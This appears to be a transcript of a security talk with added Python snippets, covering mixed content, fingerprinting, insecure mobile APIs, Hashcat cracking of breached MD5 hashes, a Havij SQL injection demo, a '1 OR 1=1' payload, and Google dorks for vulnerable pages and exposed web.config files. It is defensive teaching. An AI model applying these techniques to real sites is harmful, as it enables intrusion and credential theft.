explained when you click on here: it goes, you've loaded this page securely, but there are other resources which are not secure. Now this is really basic, right? Like you should put secure things on a secure page.
But what they're doing is they're loading the page over HTTPS. So you can trust the page. No one has been able to view the page in transit. No one has been able to modify the page in transit. But then something else is happening which is making it insecure. There's another insecure resource being put on the page. Now there's something else kind of cool you can do as of the last day, which is that if you have the latest and greatest version of Chrome, you can now go in and you can go to the security tab. And in the security tab, we get a nice little report. So this security tab, go and get this, brand new. It's been in the beta for a while. Let's just hit the public airways. And we can go in here and we can see what the problem is. And we can see that there was a non-secure origin, which was qantas.com.au. And we can see that everything else here was secure. And it's kind of interesting, because then when we go down and we actually have a look at the console, we can see the problem that was explained here in the console. Mixed content. The page here was loaded securely, but it requested this image insecurely. Why do you do that? You requested this image insecurely as well. So basically they've loaded this sprite in an insecure fashion. This sprite has taken away their green padlock and their green HTTPS. And browsers keep evolving in the way they do this. So what Chrome used to do is you used to get a little orange triangle up until a few months ago. And now they're going, you just don't get a padlock at all. You get nothing, which is cool. Google also wants to move Chrome to the point where rather than saying that a page, let's take my blog for a second, rather than say this page loads, I don't have HTTPS. There are other reasons for that we might get into later. And I just got a white page. They want to get to the point where there's like a red cross. So some visual indicator which says you can't trust this.
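The mixed content check the browser does can be approximated with a small script. This is a rough sketch using Python's standard library; the sample HTML is made up, and a real check would need to fetch the live page and also account for stylesheets and script-injected resources:

```python
from html.parser import HTMLParser

# Rough mixed-content check: find http:// subresources referenced from a
# page that was served over https, the exact problem described above.
class MixedContentFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.insecure = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # src loads a subresource on any tag; href only does on <link>.
            loads_resource = name == "src" or (name == "href" and tag == "link")
            if loads_resource and value and value.startswith("http://"):
                self.insecure.append((tag, value))

def find_mixed_content(html):
    finder = MixedContentFinder()
    finder.feed(html)
    return finder.insecure

# Made-up page: one secure image, one insecure sprite, one insecure script.
page = """
<img src="https://example.com/ok.png">
<img src="http://example.com/sprite.png">
<script src="http://example.com/app.js"></script>
"""
problems = find_mixed_content(page)
```

Running this over the example flags the sprite and the script but not the https image, which is exactly what the console warnings in the demo were complaining about.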
You can't trust it because it hasn't been loaded securely. And this is good, right? So you keep sort of raising the bar, forcing people to go towards HTTPS. A really good resource for this sort of stuff is SSL Labs. Who's used SSL Labs before? I don't need to show you then, because that's most people. But use this in case you haven't. So this will go to a website, and it will come back and tell you everything that is either good or bad about it. So if I take something like my Have I Been Pwned address, plug it into here and run it, it'll come back and eventually it will say it's got an A grade and Azure has done things right. And I'm just running on Azure, and it's basically Azure's implementation of HTTPS. So this sort of stuff is good. We're kind of continually raising the bar. Now I want to show you something interesting. This is something that really drives me nuts. Let's go to somewhere English. Oh, it hasn't warned me. I wonder if it hasn't warned me because I'm here. Anyone know what I'm looking for? Let's try HSBC. Wow, no cookie warnings. Why no cookie warnings? Who's got a site that does a cookie warning? Do you guys do that here? Yeah? Do you like it? So you know what I mean. Everyone sees these cookie warnings, and I look at this from Australia and I go, what are these European people so worried about? What's the problem with the cookies? And I wrote something a little while ago which was about really bad UX patterns. So things like you go to a website and you just get a full screen banner, and you have to wait for the banner to load. If ever you go to anything on Forbes, I don't know if anyone here looks at Forbes, they do this. If we go somewhere like that, why are you doing this to me? I don't want to see the quote of the day. I don't want to wait, and I don't want whatever the hell this is down here. I don't even know what that is. Why are you giving me ads? And then you get to continue. So I write about all these really nasty practices.
But the cookie one was interesting, because I said the cookies are a bad UX experience. Particularly on mobile: you go there and half your screen is a cookie warning, and no one seems to like it. But here's the interesting thing with that, because people say we have to do it because it's EU legislation, and you could be tracked. If you have cookies, you could be tracked. And I sort of say, well, you can be tracked anyway, because you can go somewhere like this: amiunique.org. You go to amiunique.org and you ask it to fingerprint your browser. And what it does is it goes away and it looks at various attributes of your browser and your user agent settings, and it's going to come back and tell you how unique you are. So here we go, down the bottom. It'd be interesting to see if you guys run this as well, see if you get the same results. 132,000 people have tested this, and there is no one else like me. I'm an individual. I'm unique. Isn't it nice? So I don't have to send cookies back to a tracker who then tracks me as I move around. All you have to be able to do to track someone is get them to make an HTTP request. So if you're like DoubleClick or Google Analytics or any of these sorts of things, so long as you can get the person to make a request, then you can track them. And have a look at how it does it. This many people using Chrome; wow, I'm only 0.2% of people using Chrome 48. I told you it was new. I literally updated it this morning. And okay, that is going to change, and that might change your thumbprint, but you could always be smart enough to say if all the other attributes are the same and Chrome has revved one version, then you're probably the same person. It's not an exact science. Cookies aren't an exact science. People use different browsers. Or they delete the cookies, or whatever it may be.
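The fingerprinting idea amiunique.org demonstrates can be sketched in a few lines: combine a handful of passively observable attributes and hash them into an identifier. The attribute names and values below are invented for illustration; real fingerprinting uses many more signals (canvas rendering, fonts, plugins):

```python
import hashlib

def fingerprint(attributes):
    # Canonicalise by sorting keys so the same browser always hashes the same,
    # then hash the combined string into a short tracking id.
    canonical = "|".join(f"{k}={attributes[k]}" for k in sorted(attributes))
    return hashlib.sha256(canonical.encode()).hexdigest()[:16]

# Hypothetical browser attributes, all visible in an ordinary HTTP request
# plus a little client-side script.
browser_a = {
    "user_agent": "Chrome/48.0 Windows NT 10.0",
    "language": "en-AU",
    "timezone": "UTC+10",
    "screen": "1920x1080x24",
    "fonts": "Arial,Calibri,Consolas",
}
browser_b = dict(browser_a, language="nb-NO")  # one attribute differs

id_a = fingerprint(browser_a)
id_b = fingerprint(browser_b)
```

A single differing attribute yields a completely different identifier, and with enough attributes the combination is effectively unique per visitor, which is the whole point: no cookie required.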
So I thought this was interesting, and have a look at your results as well, because you'll almost certainly find that, like me, you're unique among the 130,000-plus people who've tested. So the cookie law thing is kind of pointless. And now you guys can use this as ammunition to say we shouldn't be doing it, because we can be tracked anyway. So that's an interesting one. Let's have a look at something really different, and we might look at mobile apps. So obviously these days, these things are really popular. We've got a heap of different apps on here. And the curious thing about the apps is that many of them will talk to API backends, and many of the API backends are doing really screwy things. Really screwy security things, really screwy performance things. And here's what I thought I might show you. I'm just going to pick something from one of my recent talks. And we might pick, I think, what did I do? No, I did this. I did this at NDC a while ago. All right, so here's how this works. What you do is you get your mobile phone. And if you've got an i-thing, this is how the i-things work. You get your i-thing and you jump into, that was the very end of it. What happened there? Ah, I know why. All right, you go into your network settings. So you go into whatever Wi-Fi network it is at the moment. You go into your HTTP proxy settings. You set your server as the IP address of your PC or your Mac or whatever device it is that you want to proxy through. And you run it over that port. And what you can then do, if you're using something like Fiddler, is you can catch every request that the device sends through. So when I go into Fiddler, normally what I'm seeing here is every request from my host. When I proxy the device, I can see every request from the device that goes through the PC. It's really cool. So you see all the same sort of traffic that you normally see if you're used to using Fiddler or Charles on a Mac, except you see the stuff that your mobile apps are doing.
Now, what I wanted to show you is these guys here, British Airways. British Airways have an app. And what happens in the British Airways app is that if you are a member of the Silver or Gold Executive Club, you can get Wi-Fi passwords. But you've got to be a member. There's no other way to get the Wi-Fi passwords, unless you know how to proxy your device. And then what you can do is you can go and load this previous archive that I created. This is what happens when British Airways loads their app. It makes three requests. One of those requests is to this path. If we copy that URL that it loads and we jump over into a browser somewhere, that one will do, there's your Wi-Fi passwords. Right? So what happens is it loads the Wi-Fi passwords before you authenticate. And then they're all just sitting there on the device, and their security is that they basically just make the Wi-Fi passwords visible once you log in. That's how it works. That's the entire mechanism of authentication, which is kind of scary. So all of that's already there on the device. Now, that one's bad. I'll show you another one that's even worse. What tends to happen is developers make this assumption that because they have built the APIs and they've built the apps, that that's the way they'll always talk together. You know, they own the ecosystem, but what they miss is that anyone who sits in the middle can actually see the traffic. They can see everything that goes backwards and forwards. And I want to give you an example, because I checked a... Oh, that's talking to me. I checked a mobile app recently. And the mobile app I checked is one called Evo Magazine. It's a car magazine. It looks like this. This is the mobile app. And you go to the app store and you download it, and it's a 25-megabyte app. And then after you download it, you can sort of browse through all the editions, which you can see here, all the editions of the magazine.
And then if you want to buy one, you click on it and you enter some payment details, and then you get access to it. 25 megabytes to download. How much data do you reckon it downloads when you first open it? Who wants to take a guess? I'll take any guess. Any guess that's not Niall's. It is actually about two gigs. That's pretty close. So this is the trace just here. And if we select it all and we go to our statistics, what we can see is it actually downloads about 1.8 gigabytes' worth of zip files. Why does it do this? Because when you go and you actually have a look at the body size, and we go down to the biggest ones, it downloads all of these 75-megabyte-or-so editions of the magazine. And if we go and pick one that's a little bit smaller, what you'll see is that we can still just jump over to the browser and download it. It's thinking... ooh, you could download it yesterday. That is curious. Let's try another one. Maybe that edition's been removed. But the point here, regardless of whether it actually loads or not, and it does load this one, is that all the editions are already on the device. So, okay, A, from a performance perspective, maybe not so good, because you've just chewed up a couple of gigabytes of my bandwidth. But B, you don't need to authenticate. There's a public URL. Any of you can go there right now and get that edition of the magazine. If you're a little bit good with HTML and JavaScript and CSS, you can recreate the magazine on your own website. You can download it from Evo. So this is what they do. And my assumption is that they're doing it because it's a really nice sort of performance behavior. It's like you buy the magazine, and magically it's just there. You know, you've just downloaded a 75-megabyte magazine like that, because it's already on the device, right? You never actually have to authenticate to the service to download it. So do this with your devices. You go home, I know it sounds kind of geeky, but it's kind of cool.
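Both the British Airways and Evo cases fail the same simple test: does the API actually demand credentials before serving the resource, or does it just hide the URL in the app? A sketch of that test follows; the fetch function and endpoint paths are stand-ins, since there's no live server here:

```python
# Does an endpoint really require authentication? Request it anonymously
# and flag anything that still returns its payload. `fetch` is injected so
# the idea can be shown without a live server; all paths are made up.

def find_unprotected(fetch, urls):
    # Any endpoint that answers 200 to an anonymous request is, in effect,
    # public, no matter what the app's UI implies.
    return [url for url in urls if fetch(url, credentials=None) == 200]

# Stand-in for a real HTTP client: one endpoint checks credentials, one doesn't.
def fake_fetch(url, credentials):
    if url == "/api/editions/42.zip":
        return 200  # served to anyone, like the magazine zip files
    if url == "/api/account":
        return 200 if credentials else 401
    return 404

exposed = find_unprotected(fake_fetch, ["/api/editions/42.zip", "/api/account"])
```

With a proxy trace in hand, replaying each captured URL from a clean session with no cookies or tokens is the real-world version of this check, and it's exactly how both apps above were caught out.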
You go home and you proxy it, and you just see all the stuff it does, and you see this kind of stuff. Someone recently said, take a look at the Foxtel app. So Foxtel gives us cable television in Australia. And they have an electronic programming guide, and you have all the little icons of the channels, you know, a little Discovery icon, a little Disney icon, and they're tiny. But when they're downloaded to the iPad, they're massive. They're 3,000 pixels square. And I showed this in a talk once, and a guy came up to me afterwards and he said, I know why that happens. I worked on that app. He said, this is the way the designers gave them to us. Not a security thing, but an interesting little performance issue there. So that one is problematic. I'll do something else. Let's have a bit of a look at passwords. And I've got a little video here to show you for passwords. And then we might do a quick bit of password cracking as well. So recently, there was a really good example here from Jimmy Kimmel. And what he did is he went out onto the streets and he asked people about how they store their passwords, or rather how they create their passwords. Check this out. We're talking about cybersecurity today and how safe people's passwords are. What is one of your online passwords currently? It is my dog's name and the year I graduated from high school. What kind of dog do you have? I have a Chihuahua-Papillon. And what's its name? Jamison. Jamison. And where did you go to school? I went to school back in Greensburg, Pennsylvania. What school? Hempfield Area Senior High School. Oh, when did you graduate? In 2009. Oh, great. Getting passwords is easy. You don't actually have to crack them. It's like you just ask, what was your password? But this is actually interesting too, because it's a good sort of social engineering example where the reporter is, she's not coming on too heavy, right? Like she doesn't just say, give me your password.
She says, how do you create your password? That's the dog's name and the year I graduated. And then she starts this dialogue, right? So it starts having this conversation. What kind of dog do you have? And anyone who has a dog wants to talk about their dog, right? They're going to cough up the information. And she kind of leads the person down this road to the point where she gets the answer out of them. So it's really interesting to remember that even when we do our best with the physical and digital security of our systems, the security of our humans is still really crap, right? Like they still succumb to these things. But let's actually take a look at some password cracking just very quickly, to put it into context for anyone who hasn't seen how this works. What I'm going to do is take an example here, which is what I did in my workshop the other day. So I showed you Stratfor before, and Stratfor had all of these passwords. And all of these passwords were stored as MD5. So you know how we did a search and we found that it was Stratfor, and we found 12,000 people or something used them. Now, what we're going to do is actually jump into Hashcat. Who's used Hashcat before? There are a few people. Excellent. So this won't be new for some of you, but the vast majority of you won't have seen this before. So I'm going to look at CUDA Hashcat. So CUDA is going to run on my Nvidia graphics card. And in here I have Stratfor hashes. And these are all the hashes from that Stratfor data breach. There's about 860,000 or something in there. And what I'm going to do now is I'm going to take one of these commands, which is going to target the Stratfor hashes. In fact, I think I'm going to do this one. And what we're going to do with this command is it's going to take those Stratfor hashes.
And it's going to recalculate hashes for passwords anywhere between 6 and 10 characters: lowercase, uppercase, decimal. And it's just going to create these hashes on the fly in the GPU. And we're going to see how many of them actually get cracked. And the interesting thing here is just how fast it goes. And normally I say to people, how fast do you think we can crack hashes in a GPU? So for someone who has not worked with Hashcat before and doesn't know the answer, what do we reckon? How fast might we create hashes in a GPU? Who wants to guess? MD5. Someone who doesn't know the answer, because otherwise it kind of messes it up. Two million a second. Any other guesses? How many? Billions. Holy shit, you've got a fast computer. Billions. Okay. So we end up. Now this is just a little machine here. So this is not going to be as fast as a dedicated GPU in a big machine. But what we're doing now is just feeding in hashes. And it's going to start to warm itself up. And oh, you know what I've got to do, actually? Let's do this. I've got to delete the ones I did earlier on, because otherwise it goes through and does the same ones again. So we're going to delete the POT file down here. Get rid of that guy. All right, let's try that again. Back to there. Run. So here's the thing with hash cracking. And now here we go with cracking hashes. It looks really fast, but it's actually much, much faster than it looks. So this is actually doing... let's just pause and get a status here. When I press pause, it's going so fast, there's so much buffered to go to the console, it actually takes a while. What it's doing is it's calculating MD5 hashes on the fly and then comparing them to the ones in the database. And then if it actually finds a match of that hash, then it knows what the plain text value is. And in this case, we're ripping through, and look how many we've calculated so far: we've recovered 6,900 of those hashes already, which is kind of nice. It normally runs in this machine.
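The loop Hashcat is running, in miniature and at a tiny fraction of the speed, looks like this: hash each candidate password and look it up in the stolen hash set. The hashes below are toy examples, not Stratfor data, and the keyspace is deliberately tiny:

```python
import hashlib
from itertools import product
from string import ascii_lowercase

# Toy "stolen" hash set: unsalted MD5, exactly the weakness Stratfor had.
stolen = {
    hashlib.md5(b"abc").hexdigest(),
    hashlib.md5(b"dog").hexdigest(),
}

def crack(hashes, max_length=3):
    # Enumerate every lowercase candidate up to max_length, hash it, and
    # check for membership in the stolen set. This is the whole algorithm;
    # GPUs just do it billions of times per second.
    recovered = {}
    for length in range(1, max_length + 1):
        for combo in product(ascii_lowercase, repeat=length):
            guess = "".join(combo)
            digest = hashlib.md5(guess.encode()).hexdigest()
            if digest in hashes:
                recovered[digest] = guess
    return recovered

found = crack(stolen)
```

Because the hashes are unsalted, one pass over the keyspace cracks every matching account at once, which is why a single fast GPU can tear through hundreds of thousands of MD5 hashes in minutes.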
It does in the order of, I think I saw, about 18 million per second on my little laptop the other day. But to the question about how fast we could do it on other hardware, when we look at Hashcat, and this is where it gets really interesting, let's move to there and we go and we look at a standard machine. So what they do is they say, here are some examples. So a machine running an AMD HD 7970, which is a fast GPU, or was a fast GPU, it's about five or six years old now, you would buy it, I guess in US dollar terms, for about $300 at the time. A GPU of that class can crack MD5 hashes that fast: eight and a half billion a second. So not million. It can calculate that many hashes per second, which is just massive. And that's the old hardware, right? Like we've now had Moore's law, and things have progressed, and things have got faster. But that's how fast it was going. Now, the curious thing about this as well is that that is just if you have one. So there's a company called Stricture Group. It's run by a friend of mine who creates devices that look like this. And what they do is they put eight of those GPUs in one rack. So now we're at, what, 68 billion hashes a second. And then they have lots of racks. And the whole thing gets parallelised to the point where they can crack all of this sort of stuff enormously quickly. So the main lesson out of this is that you've got to go and have a look at something like the OWASP password cheat sheet, where they talk about using a password hashing algorithm where you can have a work factor. So something like bcrypt, where you can say, I would like my GPU or CPU, depending on where it's being calculated, to work this hard or that hard or however hard it needs to work, such that you can't calculate billions a second, but your application doesn't run terribly when you get 10 people trying to log on at once. So you need one of these adaptive algorithms that actually makes it slower.
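The work factor idea can be shown with PBKDF2 from Python's standard library; bcrypt itself needs a third-party package, so treat this as a stand-in for the same principle. Raising the iteration count raises an attacker's cost per guess by the same factor, and the salt below is a placeholder for a real random per-user value:

```python
import hashlib

def hash_password(password, salt, iterations):
    # PBKDF2 applies the hash `iterations` times; that count is the tunable
    # work factor the OWASP cheat sheet talks about.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

# Placeholder salt; in practice use os.urandom(16) and store it with the hash.
salt = b"per-user-random-salt"

fast = hash_password("hunter2", salt, 1_000)     # cheap for you AND the attacker
slow = hash_password("hunter2", salt, 100_000)   # 100x the attacker's cost per guess
```

The point is that the defender pays the cost once per login while the attacker pays it once per guess, so a work factor that adds milliseconds for your users removes billions of guesses per second from the attacker.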
And that's what Patreon, who I showed you before, did. So Patreon had bcrypt and they had a work factor of 12, which would have made it really, really hard to crack just about anything other than terrible passwords. So good news there on the hash cracking front. Let's try something else. We might try talking about DDoS for a second, because DDoS comes up a lot: distributed denial of service attacks. Last week, Anonymous DDoSed Nissan. Did anyone see this? Why would Anonymous DDoS Nissan? I'll give you a hint. It has to do with whales. That seems fair, right? Like Japan kills whales, therefore Anonymous will attack a car company. DDoS is basically just a kid throwing their toys. You know, they have a tantrum, it gets over, people move on, it does no long-lasting damage. But that's effectively what it is. Now the interesting thing with DDoS is that you can go to this link, map.ipviking.com. You fire that up and you put it in full screen, because it looks really awesome in full screen. Usually. There we go. So this starts to fire up; we should see a map appear in a moment as well. And it's showing us real-time DDoS attacks. And it's kind of cool, like it's kind of mesmerizing. You get to see things like the origin, the types, the targets. Can you see that there's usually a bit of a pattern? For some reason the traffic generally tends to move from the east to the west. I don't know why that is. We see the same countries sort of featuring a lot. So we see a lot of these DDoS attacks, and it's interesting to look at the attack types as well. So some of them are running over Telnet, other ones are running over UDP. Sometimes they run over NTP, the Network Time Protocol. So these attacks exploit different protocols in order to try and send as many malformed packets as possible. Yeah. That's a good question. How does it distinguish DDoS traffic? Does anyone know? Can you tell me if you figure it out? I honestly don't know.
I don't know how these guys actually do their measurements, I just know it's mesmerizing. They do have a bunch of other info on there, but it's kind of cool to see how often this data is flowing around. And every now and then, particularly out of China, you'll just see a massive whack of traffic go west over to the US. So DDoS is a real problem, and it's something that keeps occurring a lot, and we particularly see it continually occur with kids. Yep, question? How do they know where an attack originally came from if it's distributed? Well, a lot of it still originates from the one country. So let's have a look at what else we've got here. Oh, that's my wife. That's what happens when you leave your Facebook notifications on. I'm not sure exactly how they do their measurements. There are a couple of other services that do the same thing. You could obviously do it at the switch level at large ISPs within different countries, and I guess they've also got to identify that the traffic is malicious, because some of these attacks run over HTTP or UDP, where we have a lot of legitimate traffic flowing backwards and forwards anyway. Let's talk a little bit more about DDoS and grab a couple of things here. One of the things we've often seen in the past with DDoS is stuff like this. Everyone seen this before? You'll see all of these tweets: fire up your lasers, point your lasers at whatever the hell they want to point them at today. We saw stuff like this happen against PayPal. PayPal stopped taking payments for WikiLeaks around about 2011, and all the kids got on the Twitter and said: okay, what you've got to do is point LOIC over there. Anyone seen LOIC before? A few people? It's free software. You plug in a URL, you say target, and it just throws random packets at it. Now think again about the type of kids that I spoke about in the last talk. They've got no idea of the ramifications of what it is they're doing.
All they know is that somebody on the internet said: point your lasers at this address. And if you get enough kids around the world doing this at the same time, they get to take stuff down. We saw this sort of attack happen against Steam over Christmas. Not necessarily with LOIC, I think they were using a different tool, but Steam got DDoS'd over the Christmas period, because kids seem to like taking down gaming services over Christmas. They're just nasty. A year before, they were taking down PlayStation Network. And the interesting thing is that when they were attacking Steam, Steam put on a bunch of other services to try and cope with the extra load. They put on a bunch of caching engines, and when they did, they also screwed up their session association with the client. So what was happening was that you would go to Steam on the website and go: well, that's interesting, that's someone else's private details. Because in trying to remove load from the back end they cached the identities: they implemented more caching, but they effectively lost the affinity between the client and the session. I suspect part of that was just responding under duress, which made life very hard for them. All right, so often DDoS is very simple. It is basically just this. Another one that we keep coming back to, and we spoke about this just before, is SQL injection. I showed you sqlmap and someone asked: look, is it basically just put the URL in? These tools are really, really simple and they're really readily available. I'll give you an example. We'll go to this site here. I use this for a lot of my demos and in a lot of my workshops, and it has a bunch of different SQL injection risks on it. It's basically a website where you can log on and vote for cars that you like, and then there's a leaderboard. It's deliberately vulnerable.
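A quick aside on that Steam incident before we dig into the demo site: I don't know exactly how their caching layer was configured, but the failure mode is a classic one and easy to sketch. In this hypothetical Python example, the broken handler caches a rendered page keyed only by the URL, so the first user's private details get served to everyone; the fixed handler includes the user's identity in the cache key:

```python
# Hypothetical sketch of a response cache, not Steam's actual code.
cache = {}

def render_profile(user):
    # Stand-in for an expensive page render containing private data
    return f"Private details for {user}"

def handle_request_bad(url, user):
    if url not in cache:
        cache[url] = render_profile(user)  # whoever hits it first gets cached...
    return cache[url]                      # ...and served to every later user

def handle_request_good(url, user):
    key = (url, user)  # cache key includes the session identity
    if key not in cache:
        cache[key] = render_profile(user)
    return cache[key]

print(handle_request_bad("/account", "alice"))  # Private details for alice
print(handle_request_bad("/account", "bob"))    # Private details for alice <- leak
print(handle_request_good("/account", "bob"))   # Private details for bob
```

The lesson is that anything cached in front of an authenticated page has to vary on the user or session, or you've traded a load problem for a data disclosure problem.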
There are lots and lots of vulnerabilities on this site. Anyone's welcome to go and play around with them. You can go and exploit SQL injection on here and not go to jail, which is really good. What you can do is say something like: okay, I want to view the Lamborghinis, and I'm going to take this URL. Now let's make this a bit more interactive. Who has actually done SQL injection attacks before? Okay, some of you have, some of you haven't. You want to come and do one? Yeah, let's try. Because then if it's you and not me, I'm okay. You'll go to jail. All right, so here's what we're going to do. I'm just going to open up a tool called Havij. Some of you may have seen this before, but I want to make the point of how easy it is. What's your name? Pavel? Okay, Pavel. So here's what you're going to do. You're going to be the hacker, and what you've got to do is paste the URL on the clipboard into that target field. Yeah, you paste it over the other one. Very good. Hacking is hard. Look at that. All right, now you click the analyze button. So what it's doing is just making HTTP requests, right? This is not going direct to the database or anything like that. It's just making requests and trying to cause internal exceptions that disclose the structure of the database. And what it's actually done now, on the bottom line, is it says the DB name is hackyourselffirst underscore DB. So it's already found the name of the internal database. Now what you do is go up and click on the tables button, because what you want to try and get is a list of the tables. And then you click on get tables. There we go, and away it goes. Here we go. Now remember while we're doing this, and I'm not saying that Pavel is like a 15 year old kid, right? But this is what 15 year old kids do. They can copy and paste URLs. Now which table should we get, Pavel? Well, I reckon that one's kind of public. Let's get user profile.
So you just click the checkbox next to user profile. That's about the hardest thing in SQL injection: knowing which box to check. All right, let's get the columns. So it goes away and it's going to think, because we want to wait until it finds all the columns. And again, all it's doing here, and let's wait till it finds them all before we do anything more, is making HTTP requests and causing exceptions in the database which bubble up to the user interface. Now if you were a hacker, what data would you get out of user profile? Oh, you're good at this. Yeah, very good. All right, let's get the data. There we go. That's SQL injection. Well done, Pavel. Good one. All right, so this is kind of the point, right? It is really, really easy to mount a SQL injection attack, and what we're seeing these kids doing is using these tools. And to be honest, Havij is a bit of a, we'd say, Mickey Mouse tool. It's very, very basic, with a nice little GUI. The hardcore guys are going to use something like sqlmap. sqlmap is much more effective. But the interesting thing as well is how people are finding sites to hack, and I'll show you, because it's actually really, really easy. What they're doing most of the time is jumping into something like a Google search and saying: let's do a search with "inurl:". And then they'll say, okay, in the URL what I want is "?id=". And then they might narrow it down a bit and say: well, you know, what I really don't like is Swedish sites. We still don't like Sweden here, right? Yeah, very good. Okay, I don't like Swedish sites. And then they'd get a list of sites in Sweden which they don't like, which have an "id=" somewhere in the query string. But actually, how we might do this, we'll narrow it down a little bit and we'll say ".asp", like classic ASP.
All right, because if it's classic ASP, we know the chances of it having good SQL injection defenses are going to be much lower. And then inevitably what you get is a list of URLs with IDs on the end, which are integers, and almost certainly, if you pick a bunch of those and put a non-integer character after the integer, you'll see an internal exception. Because what they're doing is passing this untrusted data into the database and saying: just run this, it's just part of a script. So for something like one of these, it's going to be select star from widgets where widget ID equals whatever the user gives us. If it's a one or a two or a three, it's fine. If it's a three X, the database is going to say that's not a valid integer type, there's a cast exception, and that's that. So that's how SQL injection works. You may have also noticed that I have SQL injection on my t-shirt too: Bobby Tables. So SQL injection is just a ridiculously easy attack vector. While we're here doing Google searches as well, there's other stuff you can find via Google, because there's just so much stuff that is openly searchable. So I like this one. There's one you can do which is "inurl:ftp". Google will index things over FTP. And then you can go down and say: well, let's get web.config files. Who knows what a web.config is? In an ASP.NET application, the web.config is where you have your connection strings, your machine key, which is effectively your private encryption key, your API keys and your settings: a whole bunch of really good, juicy stuff. So you go and run that, and then you find all of these sites that have got an exposed web.config. Now, what this means is that there is open FTP to these websites. Google can read from them because they allow anonymous access. So not only can you go and get the web.config over FTP, you can probably go and get anything from any of these sites.
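To close the loop on those mechanics before we go further with Google: the "just run this, it's part of a script" problem goes away when untrusted input is passed as a parameter instead of being concatenated into the SQL. Here's a small sketch of both patterns using Python and SQLite; the table and values are made up purely for the demo:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE widgets (id INTEGER, name TEXT)")
conn.executemany("INSERT INTO widgets VALUES (?, ?)",
                 [(1, "Lamborghini"), (2, "Ferrari")])

user_input = "1 OR 1=1"  # attacker-controlled query string value

# Vulnerable: untrusted data concatenated straight into the statement,
# so the "OR 1=1" becomes part of the query and matches every row.
rows_bad = conn.execute(
    "SELECT name FROM widgets WHERE id = " + user_input).fetchall()
print(rows_bad)   # both rows come back

# Safe: a parameterized query treats the whole input as a single value,
# not as SQL, so no row has an id of "1 OR 1=1".
rows_good = conn.execute(
    "SELECT name FROM widgets WHERE id = ?", (user_input,)).fetchall()
print(rows_good)  # []
```

Every mainstream database driver supports placeholders like this, and it's the single defense that makes tools like Havij and sqlmap come back empty-handed.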
Not only can you get stuff, but if they've left anonymous FTP enabled with read access, they've probably also left it with write access, so you can write to these. And when you scroll down through these, you get a sense of the diversity of just how much stuff is there. .gov, Washington State Department of Transport. I know that's what it is because this has been here for years. They still haven't fixed it; it's still open. There was a time when I emailed a bunch of sites and said: hey, you might be interested to know that your FTP is open and anyone can access your stuff. And no one replied. So, fair enough. So that is curious. But of course, once you can start running these Google dorks, and this is what I meant earlier on when I said Google dork, a carefully crafted Google search, and just in case you really, really want to run other Google dorks, you go to Exploit-DB's Google Hacking Database, which is there, and you can get a list of Google dorks to run. You can get different types of Google dorks. So maybe you would like to do a search for files containing juicy info. I wonder what's in there; I've actually never looked. Let's see. This may not be public forum suitable stuff, who knows? Okay, so what have we got in here? We've got things like stats generated by, we've got Apache server status, so we're probably going to get some logs and things. PDFs with tax returns in them. What's in that one? Then you can run the Google dork. And we won't click on any of the links, but you get the idea, right? A lot of it is just indexed; it's public. Looks like some of these are served over FTP as well. Inevitably, some of these are going to have some pretty sensitive personal info in them. We can learn other things by modifying our Google dorks just slightly. So again, this one searches for web.config. Web.configs have connection strings in them. Connection strings connect to databases with accounts. Sometimes they connect with very privileged accounts.
Anyone know what the SA account is? Right, so the admin. This is the god rights account. If you can connect to a database with SA, you can not only access everything in that database, you can access everything in every other database. You can execute other commands on the SQL Server instance, so you can restart it. You can probably execute xp_cmdshell, which allows you to execute commands on the host operating system, and if you can't, you can enable xp_cmdshell by running another command. So if we find results here, then they're extra bad. And here's what I really like about these results: the password. Now, your passwords should have a combination of letters and numbers. Like that. Not like that. Don't do that. And don't use SA. Why do you think people do this? It's very easy. I'll tell you: it makes setting permissions really easy, because SA can just do everything. You don't have to worry about going to every table and setting db_datareader or db_datawriter or any of that sort of stuff. It's like magic just happens. Makes life very, very simple. So that one's kind of curious. Let me show you something else, and I'm going to open my password manager for a second. Who uses a password manager? Who uses 1Password? Who uses LastPass? Any others? KeePass? Okay. Use a password manager, whatever it is. I like 1Password for various reasons, but frankly, if you're using a password manager at all, you are so far ahead of everyone else anyway. All right, so what I'm going to do here is have a quick browse through one of these underground sites, and I'm going to start up my Tor browser. Because one of the things I think people find very curious is the fact that we do have a lot of information for sale on the web. And what I want to do is jump into AlphaBay. Normally I don't do this in really public talks, but this one is not so public, it's just us being recorded. All right, so everyone remember the Silk Road?
Silk Road was a really large underground drug site run by a guy who went under the pseudonym Dread Pirate Roberts. Dread Pirate Roberts was actually a guy called Ross Ulbricht. Ross Ulbricht eventually got caught, and one of the reasons he got caught is because he made a Stack Overflow post. I'll show you what it was, and this is kind of funny, right? Because here's this guy running an underground drug market, and he was basically asking questions on Stack Overflow related to running his underground drug market. This is the question he asked, and it's one of the things that brought him undone: he originally created the profile using an email address that identified him personally. It's one of the ways he got caught. Anyway, Silk Road got taken offline, and of course we've seen other things pop up in its place, stuff like AlphaBay. I want to show you what AlphaBay looks like. Let me type in this captcha. I then have a really, really random username and password. I don't know why I chose Google Google; I think I just fat fingered it. So we do that, because we're going to have a look at what these guys are actually selling. No idea how this will turn out. And they really like captchas, don't they? This is the second one. Now, for those of you who haven't used Tor, it's very easy to get the Tor browser: you just Google "Tor browser" and download it. It does have very legitimate purposes as well; it's a good way of having anonymity. And then inevitably, when you have the Tor browser, you can go to these onion websites. So this is running on a server somewhere, which we are accessing by going through multiple different Tor relay points. Our traffic is getting bounced around the world such that they don't know who I am and I don't know who they are. Now, there have been exploits against Tor.
